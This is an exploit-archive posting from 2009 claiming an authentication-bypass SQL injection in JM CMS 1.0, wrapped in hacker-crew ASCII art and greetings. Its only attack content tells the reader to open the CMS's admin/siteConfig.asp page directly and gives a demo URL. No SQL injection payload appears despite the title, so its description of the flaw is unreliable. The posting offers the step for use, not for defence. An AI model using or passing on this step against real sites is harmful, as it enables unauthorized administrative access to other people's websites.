[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : JM CMS 1.0 <== 1.0 (Auth Bypass) SQL Injection Vulnerability
# Published : 2009-12-16
# Author : Red-D3v1L
# Previous Title : Family Connections <= 2.1.3 Multiple Remote Vulnerabilities
# Next Title : Recipe Script v5.0 Shell Upload/XSRF/XSS Multiple Vulnerabilities


_ _ _ _  _ _ _   _ _ _ _    _ _ _    __  _ _ _ _               _____1337~h4x0rZ__   _        ___    ___
    /_/Rd_ _ /   _ _/   _ _ /         <   |/_ _   /         /   |         /  ||   ( )   /  |    (| |
    _ _ _ _/  /_ _ /  /      __ |  ()  / |  |  /   / [d0t]com/@~  | (O) /   /+~ ||_O_|( )  /0O |     | |
     _ _ _ _  _ _    _ _ _   |       |  | /   /_ _      /|__| |       /|__||| O |( ) /+__+| ^   | |
   /_ _ _ _ _ _ _ _/ _ _ _ /   |__|__ |__|/_ _ _ _ _   /|  |/|__|__( )  ( )|___/(_)/|  |/____|_ >

==============================================================================
        [?] ~ Note : Hacker R0x Lamerz Sux !
==============================================================================
        [?]  JM CMS 1.0  <== 1.0 (Auth Bypass) SQL Injection Vulnerability
==============================================================================
    [?] my home:              [ http://sec-r1z.com ]
    [?] Script:               [ JM CMS 1.0 ]
    [?] Language:             [ ASP ]
    [?] Vendor              [http://designsbyjm.net ]
    [?] Founder:              [ ./Red-D3v1L ]
    [?] Gr44tz to:            [ sec-r1z# Crew - Hackteach Team - my love :$ ]
    
########################################################################
 
===[ Exploit SQL Bypass ]=== 
 
 [?] Go to : [Path]/admin

 [?] Add : siteConfig.asp

 [?] dem0 :

 http://server/admin/siteConfig.asp